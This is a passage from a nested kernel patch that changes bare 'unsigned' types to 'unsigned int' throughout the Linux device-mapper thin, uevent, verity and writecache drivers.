+-	unsigned count, total_count = 0;
++	unsigned int count, total_count = 0;
+ 	struct dm_pool_metadata *pmd = td->pmd;
+ 	dm_block_t keys[1] = { td->id };
+ 	__le64 value;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index e6e5ab29a95df..ba4ba6be7e232 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -32,7 +32,7 @@
+ #define COMMIT_PERIOD HZ
+ #define NO_SPACE_TIMEOUT_SECS 60
+ 
+-static unsigned no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
++static unsigned int no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
+ 
+ DECLARE_DM_KCOPYD_THROTTLE_WITH_MODULE_PARM(snapshot_copy_throttle,
+ 		"A percentage of time allocated for copy on write");
+@@ -254,7 +254,7 @@ struct pool {
+ 	struct delayed_work no_space_timeout;
+ 
+ 	unsigned long last_commit_jiffies;
+-	unsigned ref_count;
++	unsigned int ref_count;
+ 
+ 	spinlock_t lock;
+ 	struct bio_list deferred_flush_bios;
+@@ -2159,7 +2159,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 	struct bio *bio;
+ 	struct bio_list bios;
+ 	struct blk_plug plug;
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 
+ 	if (tc->requeue_mode) {
+ 		error_thin_bio_list(tc, &tc->deferred_bio_list,
+@@ -2229,9 +2229,9 @@ static int cmp_cells(const void *lhs, const void *rhs)
+ 	return 0;
+ }
+ 
+-static unsigned sort_cells(struct pool *pool, struct list_head *cells)
++static unsigned int sort_cells(struct pool *pool, struct list_head *cells)
+ {
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 	struct dm_bio_prison_cell *cell, *tmp;
+ 
+ 	list_for_each_entry_safe(cell, tmp, cells, user_list) {
+@@ -2252,7 +2252,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 	struct pool *pool = tc->pool;
+ 	struct list_head cells;
+ 	struct dm_bio_prison_cell *cell;
+-	unsigned i, j, count;
++	unsigned int i, j, count;
+ 
+ 	INIT_LIST_HEAD(&cells);
+ 
+@@ -3115,7 +3115,7 @@ static int parse_pool_features(struct dm_arg_set *as, struct pool_features *pf,
+ 			       struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -3252,7 +3252,7 @@ static dm_block_t calc_metadata_threshold(struct pool_c *pt)
+  *	     read_only: Don't allow any changes to be made to the pool metadata.
+  *	     error_if_no_space: error IOs, instead of queueing, if no space.
+  */
+-static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int pool_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r, pool_created = 0;
+ 	struct pool_c *pt;
+@@ -3648,7 +3648,7 @@ static void pool_postsuspend(struct dm_target *ti)
+ 	(void) commit(pool);
+ }
+ 
+-static int check_arg_count(unsigned argc, unsigned args_required)
++static int check_arg_count(unsigned int argc, unsigned int args_required)
+ {
+ 	if (argc != args_required) {
+ 		DMWARN("Message received with %u arguments instead of %u.",
+@@ -3671,7 +3671,7 @@ static int read_dev_id(char *arg, dm_thin_id *dev_id, int warning)
+ 	return -EINVAL;
+ }
+ 
+-static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_thin_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3694,7 +3694,7 @@ static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	dm_thin_id origin_dev_id;
+@@ -3722,7 +3722,7 @@ static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_delete_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3742,7 +3742,7 @@ static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
+ 	return r;
+ }
+ 
+-static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_set_transaction_id_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id old_id, new_id;
+ 	int r;
+@@ -3771,7 +3771,7 @@ static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct po
+ 	return 0;
+ }
+ 
+-static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_reserve_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3788,7 +3788,7 @@ static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct
+ 	return r;
+ }
+ 
+-static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_release_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3812,8 +3812,8 @@ static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct
+  *   reserve_metadata_snap
+  *   release_metadata_snap
+  */
+-static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+-			char *result, unsigned maxlen)
++static int pool_message(struct dm_target *ti, unsigned int argc, char **argv,
++			char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct pool_c *pt = ti->private;
+@@ -3853,9 +3853,9 @@ static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void emit_flags(struct pool_features *pf, char *result,
+-		       unsigned sz, unsigned maxlen)
++		       unsigned int sz, unsigned int maxlen)
+ {
+-	unsigned count = !pf->zero_new_blocks + !pf->discard_enabled +
++	unsigned int count = !pf->zero_new_blocks + !pf->discard_enabled +
+ 		!pf->discard_passdown + (pf->mode == PM_READ_ONLY) +
+ 		pf->error_if_no_space;
+ 	DMEMIT("%u ", count);
+@@ -3883,10 +3883,10 @@ static void emit_flags(struct pool_features *pf, char *result,
+  *    <pool mode> <discard config> <no space config> <needs_check>
+  */
+ static void pool_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	uint64_t transaction_id;
+ 	dm_block_t nr_free_blocks_data;
+ 	dm_block_t nr_free_blocks_metadata;
+@@ -4148,7 +4148,7 @@ static void thin_dtr(struct dm_target *ti)
+  * If the pool device has discards disabled, they get disabled for the thin
+  * device as well.
+  */
+-static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int thin_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	struct thin_c *tc;
+@@ -4371,7 +4371,7 @@ static int thin_preresume(struct dm_target *ti)
+  * <nr mapped sectors> <highest mapped sector>
+  */
+ static void thin_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	ssize_t sz = 0;
+diff --git a/drivers/md/dm-uevent.c b/drivers/md/dm-uevent.c
+index 8671267200d88..a02b3f6ea47a8 100644
+--- a/drivers/md/dm-uevent.c
++++ b/drivers/md/dm-uevent.c
+@@ -60,7 +60,7 @@ static struct dm_uevent *dm_build_path_uevent(struct mapped_device *md,
+ 					      enum kobject_action action,
+ 					      const char *dm_action,
+ 					      const char *path,
+-					      unsigned nr_valid_paths)
++					      unsigned int nr_valid_paths)
+ {
+ 	struct dm_uevent *event;
+ 
+@@ -168,7 +168,7 @@ EXPORT_SYMBOL_GPL(dm_send_uevents);
+  *
+  */
+ void dm_path_uevent(enum dm_uevent_type event_type, struct dm_target *ti,
+-		   const char *path, unsigned nr_valid_paths)
++		   const char *path, unsigned int nr_valid_paths)
+ {
+ 	struct mapped_device *md = dm_table_get_md(ti->table);
+ 	struct dm_uevent *event;
+diff --git a/drivers/md/dm-uevent.h b/drivers/md/dm-uevent.h
+index d30d226f2a181..2c9ba561fd8e9 100644
+--- a/drivers/md/dm-uevent.h
++++ b/drivers/md/dm-uevent.h
+@@ -20,7 +20,7 @@ extern void dm_uevent_exit(void);
+ extern void dm_send_uevents(struct list_head *events, struct kobject *kobj);
+ extern void dm_path_uevent(enum dm_uevent_type event_type,
+ 			   struct dm_target *ti, const char *path,
+-			   unsigned nr_valid_paths);
++			   unsigned int nr_valid_paths);
+ 
+ #else
+ 
+@@ -37,7 +37,7 @@ static inline void dm_send_uevents(struct list_head *events,
+ }
+ static inline void dm_path_uevent(enum dm_uevent_type event_type,
+ 				  struct dm_target *ti, const char *path,
+-				  unsigned nr_valid_paths)
++				  unsigned int nr_valid_paths)
+ {
+ }
+ 
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 23cffce564035..962fc32c947c5 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -59,14 +59,14 @@ static int fec_decode_rs8(struct dm_verity *v, struct dm_verity_fec_io *fio,
+  * to the data block. Caller is responsible for releasing buf.
+  */
+ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+-			   unsigned *offset, struct dm_buffer **buf)
++			   unsigned int *offset, struct dm_buffer **buf)
+ {
+ 	u64 position, block, rem;
+ 	u8 *res;
+ 
+ 	position = (index + rsb) * v->fec->roots;
+ 	block = div64_u64_rem(position, v->fec->io_size, &rem);
+-	*offset = (unsigned)rem;
++	*offset = (unsigned int)rem;
+ 
+ 	res = dm_bufio_read(v->fec->bufio, block, buf);
+ 	if (IS_ERR(res)) {
+@@ -102,7 +102,7 @@ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+  */
+ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+ 				      struct dm_verity_fec_io *fio,
+-				      unsigned i, unsigned j)
++				      unsigned int i, unsigned int j)
+ {
+ 	return &fio->bufs[i][j * v->fec->rsn];
+ }
+@@ -111,7 +111,7 @@ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+  * Return an index to the current RS block when called inside
+  * fec_for_each_buffer_rs_block.
+  */
+-static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
++static inline unsigned int fec_buffer_rs_index(unsigned int i, unsigned int j)
+ {
+ 	return (i << DM_VERITY_FEC_BUF_RS_BITS) + j;
+ }
+@@ -121,12 +121,12 @@ static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
+  * starting from block_offset.
+  */
+ static int fec_decode_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio,
+-			   u64 rsb, int byte_index, unsigned block_offset,
++			   u64 rsb, int byte_index, unsigned int block_offset,
+ 			   int neras)
+ {
+ 	int r, corrected = 0, res;
+ 	struct dm_buffer *buf;
+-	unsigned n, i, offset;
++	unsigned int n, i, offset;
+ 	u8 *par, *block;
+ 
+ 	par = fec_read_parity(v, rsb, block_offset, &offset, &buf);
+@@ -197,7 +197,7 @@ static int fec_is_erasure(struct dm_verity *v, struct dm_verity_io *io,
+  * fits into buffers. Check for erasure locations if @neras is non-NULL.
+  */
+ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+-			 u64 rsb, u64 target, unsigned block_offset,
++			 u64 rsb, u64 target, unsigned int block_offset,
+ 			 int *neras)
+ {
+ 	bool is_zero;
+@@ -208,7 +208,7 @@ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+ 	u64 block, ileaved;
+ 	u8 *bbuf, *rs_block;
+ 	u8 want_digest[HASH_MAX_DIGESTSIZE];
+-	unsigned n, k;
++	unsigned int n, k;
+ 
+ 	if (neras)
+ 		*neras = 0;
+@@ -304,7 +304,7 @@ done:
+  */
+ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	if (!fio->rs)
+ 		fio->rs = mempool_alloc(&v->fec->rs_pool, GFP_NOIO);
+@@ -344,7 +344,7 @@ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+  */
+ static void fec_init_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	fec_for_each_buffer(fio, n)
+ 		memset(fio->bufs[n], 0, v->fec->rsn << DM_VERITY_FEC_BUF_RS_BITS);
+@@ -362,7 +362,7 @@ static int fec_decode_rsb(struct dm_verity *v, struct dm_verity_io *io,
+ 			  bool use_erasures)
+ {
+ 	int r, neras = 0;
+-	unsigned pos;
++	unsigned int pos;
+ 
+ 	r = fec_alloc_bufs(v, fio);
+ 	if (unlikely(r < 0))
+@@ -484,7 +484,7 @@ done:
+  */
+ void verity_fec_finish_io(struct dm_verity_io *io)
+ {
+-	unsigned n;
++	unsigned int n;
+ 	struct dm_verity_fec *f = io->v->fec;
+ 	struct dm_verity_fec_io *fio = fec_io(io);
+ 
+@@ -522,8 +522,8 @@ void verity_fec_init_io(struct dm_verity_io *io)
+ /*
+  * Append feature arguments and values to the status table.
+  */
+-unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-				 char *result, unsigned maxlen)
++unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++				 char *result, unsigned int maxlen)
+ {
+ 	if (!verity_fec_is_enabled(v))
+ 		return sz;
+@@ -589,7 +589,7 @@ bool verity_is_fec_opt_arg(const char *arg_name)
+ }
+ 
+ int verity_fec_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+-			      unsigned *argc, const char *arg_name)
++			      unsigned int *argc, const char *arg_name)
+ {
+ 	int r;
+ 	struct dm_target *ti = v->ti;
+diff --git a/drivers/md/dm-verity-fec.h b/drivers/md/dm-verity-fec.h
+index 3c46c8d618833..8454070d28242 100644
+--- a/drivers/md/dm-verity-fec.h
++++ b/drivers/md/dm-verity-fec.h
+@@ -55,10 +55,10 @@ struct dm_verity_fec_io {
+ 	struct rs_control *rs;	/* Reed-Solomon state */
+ 	int erasures[DM_VERITY_FEC_MAX_RSN];	/* erasures for decode_rs8 */
+ 	u8 *bufs[DM_VERITY_FEC_BUF_MAX];	/* bufs for deinterleaving */
+-	unsigned nbufs;		/* number of buffers allocated */
++	unsigned int nbufs;		/* number of buffers allocated */
+ 	u8 *output;		/* buffer for corrected output */
+ 	size_t output_pos;
+-	unsigned level;		/* recursion level */
++	unsigned int level;		/* recursion level */
+ };
+ 
+ #ifdef CONFIG_DM_VERITY_FEC
+@@ -72,15 +72,15 @@ extern int verity_fec_decode(struct dm_verity *v, struct dm_verity_io *io,
+ 			     enum verity_block_type type, sector_t block,
+ 			     u8 *dest, struct bvec_iter *iter);
+ 
+-extern unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-					char *result, unsigned maxlen);
++extern unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++					char *result, unsigned int maxlen);
+ 
+ extern void verity_fec_finish_io(struct dm_verity_io *io);
+ extern void verity_fec_init_io(struct dm_verity_io *io);
+ 
+ extern bool verity_is_fec_opt_arg(const char *arg_name);
+ extern int verity_fec_parse_opt_args(struct dm_arg_set *as,
+-				     struct dm_verity *v, unsigned *argc,
++				     struct dm_verity *v, unsigned int *argc,
+ 				     const char *arg_name);
+ 
+ extern void verity_fec_dtr(struct dm_verity *v);
+@@ -106,9 +106,9 @@ static inline int verity_fec_decode(struct dm_verity *v,
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline unsigned verity_fec_status_table(struct dm_verity *v,
+-					       unsigned sz, char *result,
+-					       unsigned maxlen)
++static inline unsigned int verity_fec_status_table(struct dm_verity *v,
++					       unsigned int sz, char *result,
++					       unsigned int maxlen)
+ {
+ 	return sz;
+ }
+@@ -128,7 +128,7 @@ static inline bool verity_is_fec_opt_arg(const char *arg_name)
+ 
+ static inline int verity_fec_parse_opt_args(struct dm_arg_set *as,
+ 					    struct dm_verity *v,
+-					    unsigned *argc,
++					    unsigned int *argc,
+ 					    const char *arg_name)
+ {
+ 	return -EINVAL;
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index ccf5b852fbf7a..64e8ac429984d 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -41,7 +41,7 @@
+ #define DM_VERITY_OPTS_MAX		(4 + DM_VERITY_OPTS_FEC + \
+ 					 DM_VERITY_ROOT_HASH_VERIFICATION_OPTS)
+ 
+-static unsigned dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
++static unsigned int dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
+ 
+ module_param_named(prefetch_cluster, dm_verity_prefetch_cluster, uint, S_IRUGO | S_IWUSR);
+ 
+@@ -51,7 +51,7 @@ struct dm_verity_prefetch_work {
+ 	struct work_struct work;
+ 	struct dm_verity *v;
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ };
+ 
+ /*
+@@ -196,10 +196,10 @@ out:
+ }
+ 
+ static void verity_hash_at_level(struct dm_verity *v, sector_t block, int level,
+-				 sector_t *hash_block, unsigned *offset)
++				 sector_t *hash_block, unsigned int *offset)
+ {
+ 	sector_t position = verity_position_at_level(v, block, level);
+-	unsigned idx;
++	unsigned int idx;
+ 
+ 	*hash_block = v->hash_level_block[level] + (position >> v->hash_per_block_bits);
+ 
+@@ -287,7 +287,7 @@ static int verity_verify_level(struct dm_verity *v, struct dm_verity_io *io,
+ 	u8 *data;
+ 	int r;
+ 	sector_t hash_block;
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	verity_hash_at_level(v, block, level, &hash_block, &offset);
+ 
+@@ -445,13 +445,13 @@ int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 				       struct dm_verity_io *io, u8 *data,
+ 				       size_t len))
+ {
+-	unsigned todo = 1 << v->data_dev_block_bits;
++	unsigned int todo = 1 << v->data_dev_block_bits;
+ 	struct bio *bio = dm_bio_from_per_bio_data(io, v->ti->per_io_data_size);
+ 
+ 	do {
+ 		int r;
+ 		u8 *page;
+-		unsigned len;
++		unsigned int len;
+ 		struct bio_vec bv = bio_iter_iovec(bio, *iter);
+ 
+ 		page = bvec_kmap_local(&bv);
+@@ -688,7 +688,7 @@ static void verity_prefetch_io(struct work_struct *work)
+ 		verity_hash_at_level(v, pw->block, i, &hash_block_start, NULL);
+ 		verity_hash_at_level(v, pw->block + pw->n_blocks - 1, i, &hash_block_end, NULL);
+ 		if (!i) {
+-			unsigned cluster = READ_ONCE(dm_verity_prefetch_cluster);
++			unsigned int cluster = READ_ONCE(dm_verity_prefetch_cluster);
+ 
+ 			cluster >>= v->data_dev_block_bits;
+ 			if (unlikely(!cluster))
+@@ -753,7 +753,7 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+ 	bio_set_dev(bio, v->data_dev->bdev);
+ 	bio->bi_iter.bi_sector = verity_map_sector(v, bio->bi_iter.bi_sector);
+ 
+-	if (((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 	    ((1 << (v->data_dev_block_bits - SECTOR_SHIFT)) - 1)) {
+ 		DMERR_LIMIT("unaligned io");
+ 		return DM_MAPIO_KILL;
+@@ -789,12 +789,12 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+  * Status: V (valid) or C (corruption found)
+  */
+ static void verity_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_verity *v = ti->private;
+-	unsigned args = 0;
+-	unsigned sz = 0;
+-	unsigned x;
++	unsigned int args = 0;
++	unsigned int sz = 0;
++	unsigned int x;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -1054,7 +1054,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+ 				 bool only_modifier_opts)
+ {
+ 	int r = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = v->ti;
+ 	const char *arg_name;
+ 
+@@ -1156,7 +1156,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+  *	<digest>
+  *	<salt>		Hex string or "-" if no salt.
+  */
+-static int verity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_verity *v;
+ 	struct dm_verity_sig_opts verify_args = {0};
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 98f306ec6a33d..2f555b4203679 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -42,7 +42,7 @@ struct dm_verity {
+ 	u8 *root_digest;	/* digest of the root block */
+ 	u8 *salt;		/* salt: its size is salt_size */
+ 	u8 *zero_digest;	/* digest for a zero block */
+-	unsigned salt_size;
++	unsigned int salt_size;
+ 	sector_t data_start;	/* data offset in 512-byte sectors */
+ 	sector_t hash_start;	/* hash start in blocks */
+ 	sector_t data_blocks;	/* the number of data blocks */
+@@ -54,10 +54,10 @@ struct dm_verity {
+ 	unsigned char version;
+ 	bool hash_failed:1;	/* set if hash of any block failed */
+ 	bool use_tasklet:1;	/* try to verify in tasklet before work-queue */
+-	unsigned digest_size;	/* digest size for the current hash algorithm */
++	unsigned int digest_size;	/* digest size for the current hash algorithm */
+ 	unsigned int ahash_reqsize;/* the size of temporary space for crypto */
+ 	enum verity_mode mode;	/* mode for handling verification errors */
+-	unsigned corrupted_errs;/* Number of errors for corrupted blocks */
++	unsigned int corrupted_errs;/* Number of errors for corrupted blocks */
+ 
+ 	struct workqueue_struct *verify_wq;
+ 
+@@ -77,7 +77,7 @@ struct dm_verity_io {
+ 	bio_end_io_t *orig_bi_end_io;
+ 
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ 	bool in_tasklet;
+ 
+ 	struct bvec_iter iter;
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index 96a003eb73234..431c84595ddb7 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -128,9 +128,9 @@ struct dm_writecache {
+ 	unsigned long max_age;
+ 	unsigned long pause;
+ 
+-	unsigned uncommitted_blocks;
+-	unsigned autocommit_blocks;
+-	unsigned max_writeback_jobs;
++	unsigned int uncommitted_blocks;
++	unsigned int autocommit_blocks;
++	unsigned int max_writeback_jobs;
+ 
+ 	int error;
+ 
+@@ -155,7 +155,7 @@ struct dm_writecache {
+ 	sector_t data_device_sectors;
+ 	void *block_start;
+ 	struct wc_entry *entries;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	unsigned char block_size_bits;
+ 
+ 	bool pmem_mode:1;
+@@ -178,13 +178,13 @@ struct dm_writecache {
+ 	bool metadata_only:1;
+ 	bool pause_set:1;
+ 
+-	unsigned high_wm_percent_value;
+-	unsigned low_wm_percent_value;
+-	unsigned autocommit_time_value;
+-	unsigned max_age_value;
+-	unsigned pause_value;
++	unsigned int high_wm_percent_value;
++	unsigned int low_wm_percent_value;
++	unsigned int autocommit_time_value;
++	unsigned int max_age_value;
++	unsigned int pause_value;
+ 
+-	unsigned writeback_all;
++	unsigned int writeback_all;
+ 	struct workqueue_struct *writeback_wq;
+ 	struct work_struct writeback_work;
+ 	struct work_struct flush_work;
+@@ -202,7 +202,7 @@ struct dm_writecache {
+ 
+ 	struct dm_kcopyd_client *dm_kcopyd;
+ 	unsigned long *dirty_bitmap;
+-	unsigned dirty_bitmap_size;
++	unsigned int dirty_bitmap_size;
+ 
+ 	struct bio_set bio_set;
+ 	mempool_t copy_pool;
+@@ -227,7 +227,7 @@ struct writeback_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry **wc_list;
+-	unsigned wc_list_n;
++	unsigned int wc_list_n;
+ 	struct wc_entry *wc_list_inline[WB_LIST_INLINE];
+ 	struct bio bio;
+ };
+@@ -236,7 +236,7 @@ struct copy_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry *e;
+-	unsigned n_entries;
++	unsigned int n_entries;
+ 	int error;
+ };
+ 
+@@ -369,7 +369,7 @@ static struct page *persistent_memory_page(void *addr)
+ 		return virt_to_page(addr);
+ }
+ 
+-static unsigned persistent_memory_page_offset(void *addr)
++static unsigned int persistent_memory_page_offset(void *addr)
+ {
+ 	return (unsigned long)addr & (PAGE_SIZE - 1);
+ }
+@@ -502,11 +502,11 @@ static void ssd_commit_flushed(struct dm_writecache *wc, bool wait_for_ios)
+ 		COMPLETION_INITIALIZER_ONSTACK(endio.c),
+ 		ATOMIC_INIT(1),
+ 	};
+-	unsigned bitmap_bits = wc->dirty_bitmap_size * 8;
+-	unsigned i = 0;
++	unsigned int bitmap_bits = wc->dirty_bitmap_size * 8;
++	unsigned int i = 0;
+ 
+ 	while (1) {
+-		unsigned j;
++		unsigned int j;
+ 		i = find_next_bit(wc->dirty_bitmap, bitmap_bits, i);
+ 		if (unlikely(i == bitmap_bits))
+ 			break;
+@@ -1100,7 +1100,7 @@ erase_this:
+ 	wc_unlock(wc);
+ }
+ 
+-static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1133,7 +1133,7 @@ static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *
+ 	return 0;
+ }
+ 
+-static int process_flush_on_suspend_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_on_suspend_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1153,7 +1153,7 @@ static void activate_cleaner(struct dm_writecache *wc)
+ 	wc->freelist_low_watermark = wc->n_blocks;
+ }
+ 
+-static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_cleaner_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1167,7 +1167,7 @@ static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache
+ 	return 0;
+ }
+ 
+-static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_clear_stats_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1179,8 +1179,8 @@ static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writec
+ 	return 0;
+ }
+ 
+-static int writecache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int writecache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_writecache *wc = ti->private;
+@@ -1238,9 +1238,9 @@ static void memcpy_flushcache_optimized(void *dest, void *source, size_t size)
+ static void bio_copy_block(struct dm_writecache *wc, struct bio *bio, void *data)
+ {
+ 	void *buf;
+-	unsigned size;
++	unsigned int size;
+ 	int rw = bio_data_dir(bio);
+-	unsigned remaining_size = wc->block_size;
++	unsigned int remaining_size = wc->block_size;
+ 
+ 	do {
+ 		struct bio_vec bv = bio_iter_iovec(bio, bio->bi_iter);
+@@ -1371,7 +1371,7 @@ read_next_block:
+ static void writecache_bio_copy_ssd(struct dm_writecache *wc, struct bio *bio,
+ 				    struct wc_entry *e, bool search_used)
+ {
+-	unsigned bio_size = wc->block_size;
++	unsigned int bio_size = wc->block_size;
+ 	sector_t start_cache_sec = cache_sector(wc, e);
+ 	sector_t current_cache_sec = start_cache_sec + (bio_size >> SECTOR_SHIFT);
+ 
+@@ -1540,7 +1540,7 @@ static int writecache_map(struct dm_target *ti, struct bio *bio)
+ 
+ 	bio->bi_iter.bi_sector = dm_target_offset(ti, bio->bi_iter.bi_sector);
+ 
+-	if (unlikely((((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (unlikely((((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 				(wc->block_size / 512 - 1)) != 0)) {
+ 		DMERR("I/O is not aligned, sector %llu, size %u, block size %u",
+ 		      (unsigned long long)bio->bi_iter.bi_sector,
+@@ -1666,7 +1666,7 @@ static void writecache_copy_endio(int read_err, unsigned long write_err, void *p
+ 
+ static void __writecache_endio_pmem(struct dm_writecache *wc, struct list_head *list)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct writeback_struct *wb;
+ 	struct wc_entry *e;
+ 	unsigned long n_walked = 0;
+@@ -1782,7 +1782,7 @@ pop_from_list:
+ static bool wc_add_block(struct writeback_struct *wb, struct wc_entry *e)
+ {
+ 	struct dm_writecache *wc = wb->wc;
+-	unsigned block_size = wc->block_size;
++	unsigned int block_size = wc->block_size;
+ 	void *address = memory_data(wc, e);
+ 
+ 	persistent_memory_flush_cache(address, block_size);
+@@ -1817,7 +1817,7 @@ static void __writecache_writeback_pmem(struct dm_writecache *wc, struct writeba
+ 	struct wc_entry *e, *f;
+ 	struct bio *bio;
+ 	struct writeback_struct *wb;
+-	unsigned max_pages;
++	unsigned int max_pages;
+ 
